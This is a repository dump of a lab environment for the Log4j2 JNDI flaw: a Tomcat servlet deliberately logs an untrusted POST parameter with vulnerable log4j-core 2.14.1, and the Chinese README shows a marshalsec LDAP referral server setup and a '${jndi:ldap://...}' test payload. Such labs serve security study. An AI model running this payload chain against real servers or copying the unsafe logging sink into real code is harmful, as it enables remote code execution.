├── .gitignore
├── README.md
├── log4j_demo
├── log4j_demo.iml
├── out
│ ├── artifacts
│ │ ├── log4j_demo
│ │ │ └── log4j_demo.war
│ │ └── log4j_demo_war_exploded
│ │ │ ├── WEB-INF
│ │ │ ├── classes
│ │ │ │ └── HelloServlet.class
│ │ │ ├── lib
│ │ │ │ ├── log4j-api-2.14.1.jar
│ │ │ │ ├── log4j-core-2.14.1.jar
│ │ │ │ └── servlet-api.jar
│ │ │ └── web.xml
│ │ │ └── index.jsp
│ └── production
│ │ └── log4j_demo
│ │ └── HelloServlet.class
├── src
│ └── HelloServlet.java
└── web
│ ├── WEB-INF
│ ├── lib
│ │ ├── log4j-api-2.14.1.jar
│ │ ├── log4j-core-2.14.1.jar
│ │ └── servlet-api.jar
│ └── web.xml
│ └── index.jsp
└── pic
├── image-20211210160538626.png
└── image-20211210160816201.png
/.gitignore:
--------------------------------------------------------------------------------
1 | .idea/
2 | .DS_Store
3 |
4 | # Binaries for programs and plugins
5 | *.exe
6 | *.exe~
7 | *.dll
8 | *.so
9 | *.dylib
10 |
11 | # Test binary, built with `go test -c`
12 | *.test
13 | _test
14 | _testmain.go
15 |
16 | # Output of the go coverage tool, specifically when used with LiteIDE
17 | *.out
18 |
19 | # Dependency directories (remove the comment below to include it)
20 | vendor/
21 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Log4j2 JNDI Tomcat 漏洞环境
2 |
3 | ## 部署war包
4 |
5 | ```
6 | mv log4j_demo/out/artifacts/log4j_demo tomcat/webapps
7 | ```
8 |
9 | ## 基础操作
10 |
11 | ```
12 | cd marshalsec
13 |
14 | python3 -m http.server 8888
15 |
16 | java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://127.0.0.1:8888/#Exp 1099
17 | ```
18 |
19 | ## 测试
20 |
21 | ```
22 | ${jndi:ldap://127.0.0.1:1099/Exp}
23 | ```
24 |
25 | 
26 |
27 |
28 |
29 | 
--------------------------------------------------------------------------------
/log4j_demo/log4j_demo.iml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/log4j_demo/out/artifacts/log4j_demo/log4j_demo.war:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jweny/log4j-vul-env/bdb1547cec1a4084ee33b6f1bd1121833ef50a3f/log4j_demo/out/artifacts/log4j_demo/log4j_demo.war
--------------------------------------------------------------------------------
/log4j_demo/out/artifacts/log4j_demo_war_exploded/WEB-INF/classes/HelloServlet.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jweny/log4j-vul-env/bdb1547cec1a4084ee33b6f1bd1121833ef50a3f/log4j_demo/out/artifacts/log4j_demo_war_exploded/WEB-INF/classes/HelloServlet.class
--------------------------------------------------------------------------------
/log4j_demo/out/artifacts/log4j_demo_war_exploded/WEB-INF/lib/log4j-api-2.14.1.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jweny/log4j-vul-env/bdb1547cec1a4084ee33b6f1bd1121833ef50a3f/log4j_demo/out/artifacts/log4j_demo_war_exploded/WEB-INF/lib/log4j-api-2.14.1.jar
--------------------------------------------------------------------------------
/log4j_demo/out/artifacts/log4j_demo_war_exploded/WEB-INF/lib/log4j-core-2.14.1.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jweny/log4j-vul-env/bdb1547cec1a4084ee33b6f1bd1121833ef50a3f/log4j_demo/out/artifacts/log4j_demo_war_exploded/WEB-INF/lib/log4j-core-2.14.1.jar
--------------------------------------------------------------------------------
/log4j_demo/out/artifacts/log4j_demo_war_exploded/WEB-INF/lib/servlet-api.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jweny/log4j-vul-env/bdb1547cec1a4084ee33b6f1bd1121833ef50a3f/log4j_demo/out/artifacts/log4j_demo_war_exploded/WEB-INF/lib/servlet-api.jar
--------------------------------------------------------------------------------
/log4j_demo/out/artifacts/log4j_demo_war_exploded/WEB-INF/web.xml:
--------------------------------------------------------------------------------
1 |
2 |
6 |
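7 | <servlet>
8 | <servlet-name>hello</servlet-name>
9 | <servlet-class>HelloServlet</servlet-class>
10 | </servlet>
11 | <servlet-mapping>
12 | <servlet-name>hello</servlet-name>
13 | <url-pattern>/hello</url-pattern>
14 | </servlet-mapping>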
15 |
16 |
--------------------------------------------------------------------------------
/log4j_demo/out/artifacts/log4j_demo_war_exploded/index.jsp:
--------------------------------------------------------------------------------
1 | <%@ page contentType="text/html;charset=UTF-8" language="java" %>
2 |
3 |
4 | Log4j Demo
5 |
6 |
7 | Log
8 |
12 |
13 |
14 |
--------------------------------------------------------------------------------
/log4j_demo/out/production/log4j_demo/HelloServlet.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jweny/log4j-vul-env/bdb1547cec1a4084ee33b6f1bd1121833ef50a3f/log4j_demo/out/production/log4j_demo/HelloServlet.class
--------------------------------------------------------------------------------
/log4j_demo/src/HelloServlet.java:
--------------------------------------------------------------------------------
1 | import org.apache.logging.log4j.LogManager;
2 | import org.apache.logging.log4j.Logger;
3 |
4 | import javax.servlet.ServletException;
5 | import javax.servlet.http.HttpServlet;
6 | import javax.servlet.http.HttpServletRequest;
7 | import javax.servlet.http.HttpServletResponse;
8 | import java.io.IOException;
9 |
/**
 * Minimal servlet used as the logging fixture of this demo web application.
 *
 * <p>GET answers with a fixed string. POST reads the {@code log} request
 * parameter and hands it, unmodified, to Log4j as the message of an ERROR
 * event.
 *
 * <p>NOTE(review): the POST handler is the deliberately unsafe part of the
 * fixture. The parameter is fully client-controlled and is used as the log
 * message itself, and the application bundles log4j-core 2.14.1 (see
 * WEB-INF/lib), so lookup expressions inside the message are evaluated by the
 * logging layer. Rewriting the call as a parameterized message
 * ({@code logger.error("{}", value)}) does not stop that evaluation in this
 * release; the remediation is upgrading log4j-core. The raw value is also
 * written without CR/LF neutralisation, so it can forge additional log lines.
 */
public class HelloServlet extends HttpServlet {

    /** Shared Log4j logger; public and static, exactly as the fixture declares it. */
    public static final Logger logger = LogManager.getLogger(HelloServlet.class);

    /**
     * Writes the literal line {@code doGet} to the response body.
     *
     * @param req  incoming request (not read)
     * @param resp response whose writer receives the fixed text
     * @throws ServletException declared by the servlet contract; not raised here
     * @throws IOException      if the response writer cannot be obtained
     */
    @Override
    public void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        final java.io.PrintWriter out = resp.getWriter();
        out.println("doGet");
    }

    /**
     * Logs the {@code log} request parameter at ERROR level and writes nothing
     * to the response.
     *
     * @param req  request carrying the {@code log} parameter (may be absent, in
     *             which case {@code null} is passed to the logger)
     * @param resp response (left untouched)
     * @throws ServletException declared by the servlet contract; not raised here
     * @throws IOException      declared by the servlet contract; not raised here
     */
    @Override
    protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        // Untrusted input used directly as the log message: this is the sink the demo exists to show.
        logger.error(req.getParameter("log"));
    }
}
25 |
--------------------------------------------------------------------------------
/log4j_demo/web/WEB-INF/lib/log4j-api-2.14.1.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jweny/log4j-vul-env/bdb1547cec1a4084ee33b6f1bd1121833ef50a3f/log4j_demo/web/WEB-INF/lib/log4j-api-2.14.1.jar
--------------------------------------------------------------------------------
/log4j_demo/web/WEB-INF/lib/log4j-core-2.14.1.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jweny/log4j-vul-env/bdb1547cec1a4084ee33b6f1bd1121833ef50a3f/log4j_demo/web/WEB-INF/lib/log4j-core-2.14.1.jar
--------------------------------------------------------------------------------
/log4j_demo/web/WEB-INF/lib/servlet-api.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jweny/log4j-vul-env/bdb1547cec1a4084ee33b6f1bd1121833ef50a3f/log4j_demo/web/WEB-INF/lib/servlet-api.jar
--------------------------------------------------------------------------------
/log4j_demo/web/WEB-INF/web.xml:
--------------------------------------------------------------------------------
1 |
2 |
6 |
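7 | <servlet>
8 | <servlet-name>hello</servlet-name>
9 | <servlet-class>HelloServlet</servlet-class>
10 | </servlet>
11 | <servlet-mapping>
12 | <servlet-name>hello</servlet-name>
13 | <url-pattern>/hello</url-pattern>
14 | </servlet-mapping>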
15 |
16 |
--------------------------------------------------------------------------------
/log4j_demo/web/index.jsp:
--------------------------------------------------------------------------------
1 | <%@ page contentType="text/html;charset=UTF-8" language="java" %>
2 |
3 |
4 | Log4j Demo
5 |
6 |
7 | Log
8 |
12 |
13 |
14 |
--------------------------------------------------------------------------------
/pic/image-20211210160538626.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jweny/log4j-vul-env/bdb1547cec1a4084ee33b6f1bd1121833ef50a3f/pic/image-20211210160538626.png
--------------------------------------------------------------------------------
/pic/image-20211210160816201.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jweny/log4j-vul-env/bdb1547cec1a4084ee33b6f1bd1121833ef50a3f/pic/image-20211210160816201.png
--------------------------------------------------------------------------------